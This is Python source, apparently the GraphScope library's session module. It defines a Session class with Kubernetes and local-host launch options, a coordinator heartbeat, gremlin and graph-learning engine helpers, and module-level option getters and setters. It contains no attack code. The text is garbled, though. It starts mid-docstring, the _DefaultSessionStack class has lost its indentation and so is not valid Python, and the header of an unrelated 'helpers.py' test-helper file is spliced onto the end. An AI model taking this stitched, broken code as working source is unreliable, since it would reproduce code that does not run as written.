        >>> r = gs.sssp(pg, 4)
        >>> sess.close()
    We support setup a service cluster and create a RPC session in following ways:
    - GraphScope graph computation service run in cluster managed by kubernetes.
        >>> s = graphscope.session()
        Also, :class:`Session` provides several keyword params for users to define the cluster.
        You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
        param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
        you can find all params detail in :meth:`__init__` method.
        >>> s = graphscope.session(
        ...     k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
        ...     k8s_vineyard_cpu=0.1,
        ...     k8s_vineyard_mem="256Mi",
        ...     vineyard_shared_mem="4Gi",
        ...     k8s_engine_cpu=0.1,
        ...     k8s_engine_mem="256Mi")
    - or all params can be provided by a json configuration file or configuration dict.
        >>> s = graphscope.session(config='/tmp/config.json')
        >>> # Or
        >>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
    """
    @set_defaults(gs_config)
    def __init__(
        self,
        config=None,
        addr=gs_config.addr,
        mode=gs_config.mode,
        cluster_type=gs_config.cluster_type,
        num_workers=gs_config.num_workers,
        preemptive=gs_config.preemptive,
        k8s_namespace=gs_config.k8s_namespace,
        k8s_service_type=gs_config.k8s_service_type,
        k8s_gs_image=gs_config.k8s_gs_image,
        k8s_etcd_image=gs_config.k8s_etcd_image,
        k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
        k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
        k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
        k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
        k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
        k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
        k8s_etcd_mem=gs_config.k8s_etcd_mem,
        k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
        k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
        k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
        vineyard_shared_mem=gs_config.vineyard_shared_mem,
        k8s_engine_cpu=gs_config.k8s_engine_cpu,
        k8s_engine_mem=gs_config.k8s_engine_mem,
        k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
        k8s_mars_worker_mem=gs_config.mars_worker_mem,
        k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
        k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
        k8s_volumes=gs_config.k8s_volumes,
        k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
        timeout_seconds=gs_config.timeout_seconds,
        dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
        with_mars=gs_config.with_mars,
        enable_gaia=gs_config.enable_gaia,
        reconnect=False,
        **kw,
    ):
        """Construct a new GraphScope session.
        Args:
            config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
                For str, it will identify it as a path and read the configuration file to build a
                session if file exist. If not specified, the global default configuration
                :code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
                in environment. Note that it will overwrite explicit parameters. Defaults to None.
            addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
                A new session id will be generated for each session connection.
            mode (str, optional): optional values are eager and lazy. Defaults to eager.
                Eager execution is a flexible platform for research and experimentation, it provides:
                    An intuitive interface: Quickly test on small data.
                    Easier debugging: Call ops directly to inspect running models and test changes.
                Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
                information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
            cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
                Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
            num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
            preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
                as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
                which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
                same value.
            k8s_namespace (str, optional): Contains the namespace to create all resource inside.
                If param missing, it will try to read namespace from kubernetes context, or
                a random namespace will be created and deleted if namespace not exist.
                Defaults to None.
            k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
                Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
            k8s_gs_image (str, optional): The GraphScope engine's image.
            k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
            k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
            k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
            k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
                discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
                a bundled vineyard container otherwise.
            k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
            k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
            vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
            k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
            k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
            k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
            k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
            k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
            k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
            k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
            k8s_mars_worker_cpu (float, optional):
                Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
            k8s_mars_worker_mem (str, optional):
                Minimum number of memory request for mars worker container. Defaults to '4Gi'.
            k8s_mars_scheduler_cpu (float, optional):
                Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
            k8s_mars_scheduler_mem (str, optional):
                Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
            with_mars (bool, optional):
                Launch graphscope with mars. Defaults to False.
            enable_gaia (bool, optional):
                Launch graphscope with gaia enabled. Defaults to False.
            k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
                containers in a pod. Defaults to {}.
                For example, you can mount host path with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {
                            "path": "<path>",
                            "type": "Directory"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            },
                            {
                                "mountPath": "<path2>"
                            }
                        ]
                    }
                }
                Or you can mount PVC with:
                k8s_volumes = {
                    "my-data": {
                        "type": "persistentVolumeClaim",
                        "field": {
                            "claimName": "your-pvc-name"
                        },
                        "mounts": [
                            {
                                "mountPath": "<path1>"
                            }
                        ]
                    }
                }
                Also, you can mount a single volume with:
                k8s_volumes = {
                    "my-data": {
                        "type": "hostPath",
                        "field": {xxx},
                        "mounts": {
                            "mountPath": "<path1>"
                        }
                    }
                }
            timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
                k8s_waiting_for_delete is True).
            dangling_timeout_seconds (int, optional): After seconds of client disconnect,
                coordinator will kill this graphscope instance. Defaults to 600.
                Expect this value to be greater than 5 (heartbeat interval).
                Disable dangling check by setting -1.
            k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
            **kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
                - k8s_minikube_vm_driver: Deprecated.
                - k8s_client_config (dict, optional):
                    Provide configurable parameters for connecting to remote k8s,
                    which strongly relies on the `kube_config.new_client_from_config` function.
                    eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
                    config_file: Name of the kube-config file.
                    context: set the active context. If is set to None, current_context from config file will be used.
                    persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
                - log_level: Deprecated.
                    Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
                - show_log: Deprecated.
                    Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
                - k8s_vineyard_shared_mem: Deprecated.
                    Please use vineyard_shared_mem instead.
            reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
                the connect request would be rejected with there is still an existing session connected. There
                are cases where the session still exists and user's client has lost connection with the backend,
                e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
                deterministic behavior would be better.
                If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
                to ensure there's no such an active client actually.
                Defaults to :code:`False`.
                - k8s_gie_graph_manager_image: Deprecated.
                - k8s_gie_graph_manager_cpu: Deprecated.
                - k8s_gie_graph_manager_mem: Deprecated.
                - k8s_zookeeper_image: Deprecated.
                - k8s_zookeeper_cpu: Deprecated.
                - k8s_zookeeper_mem: Deprecated.
        Raises:
            TypeError: If the given argument combination is invalid and cannot be used to create
                a GraphScope session.
        """
        self._config_params = {}
        # NOTE(review): "accessable" is a misspelling of "accessible"; kept
        # as-is because it is an instance attribute name.
        self._accessable_params = (
            "addr",
            "mode",
            "cluster_type",
            "num_workers",
            "preemptive",
            "k8s_namespace",
            "k8s_service_type",
            "k8s_gs_image",
            "k8s_etcd_image",
            "k8s_image_pull_policy",
            "k8s_image_pull_secrets",
            "k8s_coordinator_cpu",
            "k8s_coordinator_mem",
            "k8s_etcd_num_pods",
            "k8s_etcd_cpu",
            "k8s_etcd_mem",
            "k8s_vineyard_daemonset",
            "k8s_vineyard_cpu",
            "k8s_vineyard_mem",
            "vineyard_shared_mem",
            "k8s_engine_cpu",
            "k8s_engine_mem",
            "k8s_mars_worker_cpu",
            "k8s_mars_worker_mem",
            "k8s_mars_scheduler_cpu",
            "k8s_mars_scheduler_mem",
            "with_mars",
            "enable_gaia",
            "reconnect",
            "k8s_volumes",
            "k8s_waiting_for_delete",
            "timeout_seconds",
            "dangling_timeout_seconds",
        )
        self._deprecated_params = (
            "show_log",
            "log_level",
            "k8s_vineyard_shared_mem",
            "k8s_gie_graph_manager_image",
            "k8s_gie_graph_manager_cpu",
            "k8s_gie_graph_manager_mem",
            "k8s_zookeeper_image",
            "k8s_zookeeper_cpu",
            "k8s_zookeeper_mem",
        )
        # Capture the constructor arguments by name: every accessible param is
        # a local variable at this point, so locals() lets us copy them in bulk.
        saved_locals = locals()
        for param in self._accessable_params:
            self._config_params[param] = saved_locals[param]
        # parse config, which should be a path to config file, or dict
        # config has highest priority
        if isinstance(config, dict):
            self._config_params.update(config)
        elif isinstance(config, str):
            self._load_config(config, slient=False)
        elif DEFAULT_CONFIG_FILE:
            # The default config file is optional: load errors are swallowed.
            self._load_config(DEFAULT_CONFIG_FILE)
        # update other optional params
        self._config_params.update(kw)
        # initial setting of cluster_type
        self._cluster_type = self._parse_cluster_type()
        # initial dag
        self._dag = Dag()
        # mars cannot work with run-on-local mode
        if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
            raise NotImplementedError(
                "Mars cluster cannot be launched along with local GraphScope deployment"
            )
        # deprecated params handle
        for param in self._deprecated_params:
            if param in kw:
                warnings.warn(
                    "The `{0}` parameter has been deprecated and has no effect.".format(
                        param
                    ),
                    category=DeprecationWarning,
                )
                if param == "show_log" or param == "log_level":
                    warnings.warn(
                        "Please use `graphscope.set_option({0}={1})` instead".format(
                            param, kw.pop(param, None)
                        ),
                        category=DeprecationWarning,
                    )
                if param == "k8s_vineyard_shared_mem":
                    warnings.warn(
                        "Please use 'vineyard_shared_mem' instead",
                        category=DeprecationWarning,
                    )
                # Drop the deprecated key so it does not trip the strict
                # "unrecognized keyword" check below.
                kw.pop(param, None)
        # update k8s_client_config params
        self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
        # There should be no more custom keyword arguments.
        if kw:
            raise ValueError("Value not recognized: ", list(kw.keys()))
        if self._config_params["addr"]:
            logger.info(
                "Connecting graphscope session with address: %s",
                self._config_params["addr"],
            )
        else:
            logger.info(
                "Initializing graphscope session with parameters: %s",
                self._config_params,
            )
        self._closed = False
        # coordinator service endpoint
        self._coordinator_endpoint = None
        self._launcher = None
        self._heartbeat_sending_thread = None
        self._grpc_client = None
        self._session_id = None  # unique identifier across sessions
        # engine config:
        #
        #   {
        #       "experiment": "ON/OFF",
        #       "vineyard_socket": "...",
        #       "vineyard_rpc_endpoint": "..."
        #   }
        self._engine_config = None
        # interactive instance related graph map
        self._interactive_instance_dict = {}
        # learning engine related graph map
        self._learning_instance_dict = {}
        self._default_session = None
        # Ensure resources are released even if the user forgets to close().
        atexit.register(self.close)
        # create and connect session
        with CaptureKeyboardInterrupt(self.close):
            self._connect()
        self._disconnected = False
        # heartbeat
        self._heartbeat_interval_seconds = 5
        self._heartbeat_sending_thread = threading.Thread(
            target=self._send_heartbeat, args=()
        )
        # Daemon thread so a lingering heartbeat never blocks interpreter exit.
        self._heartbeat_sending_thread.daemon = True
        self._heartbeat_sending_thread.start()
        # networkx module
        self._nx = None
    def __repr__(self):
        return str(self.info)
    def __str__(self):
        return repr(self)
    @property
    def session_id(self):
        # Unique identifier assigned by the coordinator during _connect().
        return self._session_id
    @property
    def dag(self):
        # The operation DAG accumulated by this session (lazy-mode graph).
        return self._dag
    def _load_config(self, path, slient=True):
        """Merge a JSON config file into the session parameters.
        NOTE(review): `slient` is a typo of "silent"; kept for compatibility.
        When True, any failure to read/parse the file is ignored.
        """
        config_path = os.path.expandvars(os.path.expanduser(path))
        try:
            with open(config_path, "r") as f:
                data = json.load(f)
                self._config_params.update(data)
        except Exception as exp:  # noqa
            if not slient:
                raise exp
    def _parse_cluster_type(self):
        """Resolve the cluster type enum from the configured parameters."""
        if self._config_params["addr"] is not None:
            # get the cluster type after connecting
            return types_pb2.UNDEFINED
        else:
            if self._config_params["cluster_type"] == "hosts":
                self._run_on_local()
                return types_pb2.HOSTS
            elif self._config_params["cluster_type"] == "k8s":
                return types_pb2.K8S
            else:
                raise ValueError("Expect hosts or k8s of cluster_type parameter")
    @property
    def engine_config(self):
        """Show the engine configuration associated with session in json format."""
        return self._engine_config
    @property
    def info(self):
        """Show all resources info associated with session in json format."""
        info = {}
        if self._closed:
            info["status"] = "closed"
        elif self._grpc_client is None or self._disconnected:
            info["status"] = "disconnected"
        else:
            info["status"] = "active"
        if self._cluster_type == types_pb2.K8S:
            info["type"] = "k8s"
            info["engine_hosts"] = ",".join(self._pod_name_list)
            info["namespace"] = self._config_params["k8s_namespace"]
        else:
            info["type"] = "hosts"
            info["engine_hosts"] = self._engine_config["engine_hosts"]
        info["cluster_type"] = str(self._cluster_type)
        info["session_id"] = self.session_id
        info["num_workers"] = self._config_params["num_workers"]
        info["coordinator_endpoint"] = self._coordinator_endpoint
        info["engine_config"] = self._engine_config
        return info
    @property
    def closed(self):
        return self._closed
    def eager(self):
        """Return True when the session evaluates operations immediately."""
        return self._config_params["mode"] == "eager"
    def _send_heartbeat(self):
        """Background loop: ping the coordinator every few seconds and track
        the connection state in ``self._disconnected``."""
        while not self._closed:
            if self._grpc_client:
                try:
                    self._grpc_client.send_heartbeat()
                except Exception as exc:
                    logger.warning(exc)
                    self._disconnected = True
                else:
                    self._disconnected = False
            time.sleep(self._heartbeat_interval_seconds)
    def close(self):
        """Closes this session.
        This method frees all resources associated with the session.
        """
        if self._closed:
            return
        self._closed = True
        self._coordinator_endpoint = None
        self._deregister_default()
        if self._heartbeat_sending_thread:
            # Bounded join: the loop exits on the next tick since _closed is set.
            self._heartbeat_sending_thread.join(
                timeout=self._heartbeat_interval_seconds
            )
            self._heartbeat_sending_thread = None
        self._disconnected = True
        # close all interactive instances
        for instance in self._interactive_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._interactive_instance_dict.clear()
        # close all learning instances
        for instance in self._learning_instance_dict.values():
            try:
                if instance is not None:
                    instance.close()
            except Exception:
                pass
        self._learning_instance_dict.clear()
        if self._grpc_client:
            try:
                self._grpc_client.close()
            except Exception:
                pass
            self._grpc_client = None
            _session_dict.pop(self._session_id, None)
        # clean up
        if self._config_params["addr"] is None:
            # Only stop the launcher for clusters this session started itself.
            try:
                if self._launcher:
                    self._launcher.stop()
            except Exception:
                pass
            self._pod_name_list = []
    def _close_interactive_instance(self, instance):
        """Close a interactive instance."""
        if self.eager():
            # Keep the key with a None value: gremlin() treats None as "closed".
            self._interactive_instance_dict[instance.object_id] = None
    def _close_learning_instance(self, instance):
        """Close a learning instance."""
        if self.eager():
            self._learning_instance_dict[instance.object_id] = None
    def __del__(self):
        # cleanly ignore all exceptions
        try:
            self.close()
        except Exception:  # pylint: disable=broad-except
            pass
    def _check_closed(self, msg=None):
        """Internal: raise a ValueError if session is closed"""
        if self.closed:
            raise ValueError(msg or "Operation on closed session.")
    # Context manager
    def __enter__(self):
        """Context management protocol.
        Returns self and register self as default session.
        """
        self._check_closed()
        self.as_default()
        return self
    def __exit__(self, type, value, traceback):
        """Deregister self from the default session,
        close the session and release the resources, ignore all exceptions in close().
        """
        try:
            self._deregister_default()
            self.close()
        except Exception:
            pass
    def as_default(self):
        """Obtain a context manager that make this object as default session.
        This method is used when a Session is constructed, which will immediately
        install self as a default session.
        Raises:
            ValueError: If default session exist in current context.
        Returns:
            A context manager using this session as the default session.
        """
        if not _default_session_stack.is_cleared():
            raise ValueError(
                "A default session is already active. You must explicitly call Session.close()."
            )
        # session context manager
        self._default_session = default_session(self)
        self._default_session.__enter__()
    def _deregister_default(self):
        """Remove self from the default session stack."""
        if self._default_session:
            self._default_session.__exit__(None, None, None)
            self._default_session = None
    def _wrapper(self, dag_node):
        """Evaluate `dag_node` now in eager mode, or return it untouched in lazy mode."""
        if self.eager():
            return self.run(dag_node)
        else:
            return dag_node
    def run(self, fetches, debug=False):
        """Run operations of `fetch`.
        Args:
            fetch: :class:`Operation`
        Raises:
            RuntimeError:
                Client disconnect to the service. Or run on a closed session.
            ValueError:
                If fetch is not a instance of :class:`Operation`. Or
                the fetch has been evaluated.
            InvalidArgumentError:
                Not recognized on output type.
        Returns:
            Different values for different output types of :class:`Operation`
        """
        if self._closed:
            raise RuntimeError("Attempted to use a closed Session.")
        if not self._grpc_client:
            raise RuntimeError("Session disconnected.")
        fetch_handler = _FetchHandler(self.dag, fetches)
        try:
            response = self._grpc_client.run(fetch_handler.targets)
        except FatalError:
            # A fatal RPC error leaves the session unusable; tear it down.
            self.close()
            raise
        return fetch_handler.wrapper_results(response)
    def _connect(self):
        """Launch (or attach to) a GraphScope cluster and open the RPC session."""
        if self._config_params["addr"] is not None:
            # try connect to exist coordinator
            self._coordinator_endpoint = self._config_params["addr"]
        elif self._cluster_type == types_pb2.K8S:
            if (
                self._config_params["k8s_etcd_image"] is None
                or self._config_params["k8s_gs_image"] is None
            ):
                raise K8sError("None image found.")
            if isinstance(
                self._config_params["k8s_client_config"],
                kube_client.api_client.ApiClient,
            ):
                # A pre-constructed kubernetes ApiClient is used directly.
                api_client = self._config_params["k8s_client_config"]
            else:
                api_client = kube_config.new_client_from_config(
                    **self._config_params["k8s_client_config"]
                )
            self._launcher = KubernetesClusterLauncher(
                api_client=api_client,
                **self._config_params,
            )
        elif (
            self._cluster_type == types_pb2.HOSTS
            and isinstance(self._config_params["hosts"], list)
            and len(self._config_params["hosts"]) != 0
            and self._config_params["num_workers"] > 0
        ):
            # launch coordinator with hosts
            self._launcher = HostsClusterLauncher(
                **self._config_params,
            )
        else:
            raise RuntimeError(
                f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
            )
        # launching graphscope service
        if self._launcher is not None:
            self._launcher.start()
            self._coordinator_endpoint = self._launcher.coordinator_endpoint
        # waiting service ready
        self._grpc_client = GRPCClient(self._launcher, self._config_params["reconnect"])
        self._grpc_client.waiting_service_ready(
            timeout_seconds=self._config_params["timeout_seconds"],
        )
        # connect and fetch logs from rpc server
        try:
            (
                self._session_id,
                self._cluster_type,
                self._engine_config,
                self._pod_name_list,
                self._config_params["num_workers"],
                self._config_params["k8s_namespace"],
            ) = self._grpc_client.connect(
                cleanup_instance=not bool(self._config_params["addr"]),
                dangling_timeout_seconds=self._config_params[
                    "dangling_timeout_seconds"
                ],
            )
            # fetch logs
            if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
                self._grpc_client.fetch_logs()
            _session_dict[self._session_id] = self
        except Exception:
            self.close()
            raise
    def get_config(self):
        """Get configuration of the session."""
        return self._config_params
    def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
        """Create a graph DAG node in this session (evaluated now in eager mode)."""
        return self._wrapper(
            GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
        )
    def load_from(self, *args, **kwargs):
        """Load a graph within the session.
        See more information in :meth:`graphscope.load_from`.
        """
        with default_session(self):
            return graphscope.load_from(*args, **kwargs)
    def _run_on_local(self):
        """Fill in the parameters required by the local (hosts) launcher."""
        self._config_params["hosts"] = ["localhost"]
        self._config_params["port"] = None
        self._config_params["vineyard_socket"] = ""
    @set_defaults(gs_config)
    def gremlin(self, graph, engine_params=None):
        """Get a interactive engine handler to execute gremlin queries.
        It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
        that will be evaluated by :method:`sess.run` in eager mode.
        Note that this method will be executed implicitly in eager mode when a property graph created
        and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
        If you want to create a new instance under the same graph by different params, you should close
        the instance first.
        .. code:: python
            >>> # close and recreate InteractiveQuery in eager mode.
            >>> interactive_query = sess.gremlin(g)
            >>> interactive_query.close()
            >>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
        Args:
            graph (:class:`graphscope.framework.graph.GraphDAGNode`):
                The graph to create interactive instance.
            engine_params (dict, optional): Configure startup parameters of interactive engine.
                You can also configure this param by `graphscope.set_option(engine_params={})`.
                See a list of configurable keys in
                `interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
        Raises:
            InvalidArgumentError:
                - :code:`graph` is not a property graph.
                - :code:`graph` is unloaded in eager mode.
        Returns:
            :class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
                InteractiveQuery to execute gremlin queries, evaluated in eager mode.
        """
        # Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
        # self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
        if (
            self.eager()
            and graph.vineyard_id in self._interactive_instance_dict
            and self._interactive_instance_dict[graph.vineyard_id] is not None
        ):
            interactive_query = self._interactive_instance_dict[graph.vineyard_id]
            if interactive_query.status == InteractiveQueryStatus.Running:
                return interactive_query
            elif interactive_query.status == InteractiveQueryStatus.Failed:
                raise InteractiveEngineInternalError(interactive_query.error_msg)
            else:
                # Initializing.
                # while True is ok, as the status is either running or failed eventually after timeout.
                while True:
                    time.sleep(1)
                    if interactive_query.status == InteractiveQueryStatus.Running:
                        return interactive_query
                    elif interactive_query.status == InteractiveQueryStatus.Failed:
                        raise InteractiveEngineInternalError(
                            interactive_query.error_msg
                        )
        if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        if self.eager():
            if not graph.loaded():
                raise InvalidArgumentError("The graph has already been unloaded")
            # cache the instance of interactive query in eager mode
            interactive_query = InteractiveQuery()
            self._interactive_instance_dict[graph.vineyard_id] = interactive_query
        try:
            enable_gaia = self._config_params["enable_gaia"]
            _wrapper = self._wrapper(
                InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
            )
        except Exception as e:
            if self.eager():
                # Record the failure on the cached placeholder so later calls
                # surface the same error instead of hanging in Initializing.
                interactive_query.status = InteractiveQueryStatus.Failed
                interactive_query.error_msg = str(e)
            raise InteractiveEngineInternalError(str(e)) from e
        else:
            if self.eager():
                interactive_query = _wrapper
                graph._attach_interactive_instance(interactive_query)
        return _wrapper
    def learning(self, graph, nodes=None, edges=None, gen_labels=None):
        """Start a graph learning engine.
        Args:
            nodes (list): The node types that will be used for gnn training.
            edges (list): The edge types that will be used for gnn training.
            gen_labels (list): Extra node and edge labels on original graph for gnn training.
        Returns:
            :class:`graphscope.learning.GraphDAGNode`:
                An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
        """
        if (
            self.eager()
            and graph.vineyard_id in self._learning_instance_dict
            and self._learning_instance_dict[graph.vineyard_id] is not None
        ):
            # Reuse the cached learning instance for this graph.
            return self._learning_instance_dict[graph.vineyard_id]
        if sys.platform != "linux" and sys.platform != "linux2":
            raise RuntimeError(
                f"The learning engine currently only supports running on Linux, got {sys.platform}"
            )
        if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
            raise InvalidArgumentError("The graph should be a property graph.")
        if self.eager():
            if not graph.loaded():
                raise InvalidArgumentError("The graph has already been unloaded")
        from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
        _wrapper = self._wrapper(
            LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
        )
        if self.eager():
            self._learning_instance_dict[graph.vineyard_id] = _wrapper
            graph._attach_learning_instance(_wrapper)
        return _wrapper
    def nx(self):
        """Return the graphscope.nx module bound to this session (eager only)."""
        if not self.eager():
            raise RuntimeError(
                "Networkx module need the session to be eager mode. "
                "Current session is lazy mode."
            )
        if self._nx:
            return self._nx
        import importlib.util
        spec = importlib.util.find_spec("graphscope.nx")
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)
        # Subclass Graph/DiGraph dynamically so each session gets classes bound
        # to itself via the `_session` attribute, without mutating a shared module.
        graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
        digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
        setattr(graph, "_session", self)
        setattr(digraph, "_session", self)
        setattr(mod, "Graph", graph)
        setattr(mod, "DiGraph", digraph)
        self._nx = mod
        return self._nx
# Lowercase alias so users can write ``graphscope.session(...)``.
session = Session
def set_option(**kwargs):
    """Update the value of one or more GraphScope options.

    See :class:`graphscope.Session` for the detailed meaning of each option.

    Available options:
        num_workers, log_level, show_log, vineyard_shared_mem, k8s_namespace,
        k8s_service_type, k8s_gs_image, k8s_etcd_image, k8s_image_pull_policy,
        k8s_image_pull_secrets, k8s_coordinator_cpu, k8s_coordinator_mem,
        k8s_vineyard_daemonset, k8s_vineyard_cpu, k8s_vineyard_mem,
        k8s_engine_cpu, k8s_engine_mem, k8s_mars_worker_cpu,
        k8s_mars_worker_mem, k8s_mars_scheduler_cpu, k8s_mars_scheduler_mem,
        with_mars, enable_gaia, k8s_volumes, k8s_waiting_for_delete,
        engine_params, initializing_interactive_engine, timeout_seconds

    Args:
        kwargs: Key-value pairs of GraphScope config options to set.

    Raises:
        ValueError: If no such option exists.

    Returns: None
    """
    # Validate every key up front so nothing is applied on partial failure.
    unknown = [key for key in kwargs if not hasattr(gs_config, key)]
    if unknown:
        raise ValueError(f"No such option {unknown[0]} exists.")
    for key, value in kwargs.items():
        setattr(gs_config, key, value)
    GSLogger.update()
def get_option(key):
    """Get the value of a single GraphScope option.

    See :class:`graphscope.Session` for the detailed meaning of each option.

    Available options:
        num_workers, log_level, show_log, vineyard_shared_mem, k8s_namespace,
        k8s_service_type, k8s_gs_image, k8s_etcd_image, k8s_image_pull_policy,
        k8s_image_pull_secrets, k8s_coordinator_cpu, k8s_coordinator_mem,
        k8s_vineyard_daemonset, k8s_vineyard_cpu, k8s_vineyard_mem,
        k8s_engine_cpu, k8s_engine_mem, k8s_mars_worker_cpu,
        k8s_mars_worker_mem, k8s_mars_scheduler_cpu, k8s_mars_scheduler_mem,
        with_mars, enable_gaia, k8s_volumes, k8s_waiting_for_delete,
        engine_params, initializing_interactive_engine, timeout_seconds

    Args:
        key (str): Key of the GraphScope config option to read.

    Raises:
        ValueError: If no such option exists.

    Returns: result: the value of the option
    """
    if not hasattr(gs_config, key):
        raise ValueError("No such option {} exists.".format(key))
    return getattr(gs_config, key)
def default_session(session):
    """Context manager installing *session* as the default session.

    Code executed inside the resulting ``with`` block is handled by the
    given session whenever an explicit session is not supplied.

    Args:
        session: :class:`Session`
            The session to be installed as the default session.

    Returns:
        A context manager for the default session.
    """
    return _default_session_stack.get_controller(session)
def get_default_session():
    """Return the innermost default session for the current context.

    Raises:
        RuntimeError: If no default session exists.

    Returns:
        The default :class:`Session`.
    """
    return _default_session_stack.get_default()
def get_session_by_id(handle):
    """Look up a registered session by its handle.

    Raises:
        ValueError: If no session with the given handle is registered.
    """
    if handle in _session_dict:
        return _session_dict.get(handle)
    raise ValueError("Session {} not exists.".format(handle))
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
    """Construct a graph within the current default session.

    Convenience wrapper forwarding all arguments to
    ``get_default_session().g(...)``.
    """
    default_sess = get_default_session()
    return default_sess.g(incoming_data, oid_type, directed, generate_eid)
|
helpers.py | """
Helper functions file for OCS QE
"""
import logging
import re
import datetime
import statistics
import os
from subprocess import TimeoutExpired
import tempfile
import time
import yaml
import threading
from ocs_ci.ocs.ocp import OCP
from uuid import uuid4
from ocs_ci.ocs.exceptions import TimeoutExpiredError, UnexpectedBehaviour
from concurrent.futures import ThreadPoolExecutor
from ocs_ci.ocs import constants, defaults, ocp
from ocs_ci.utility import templating
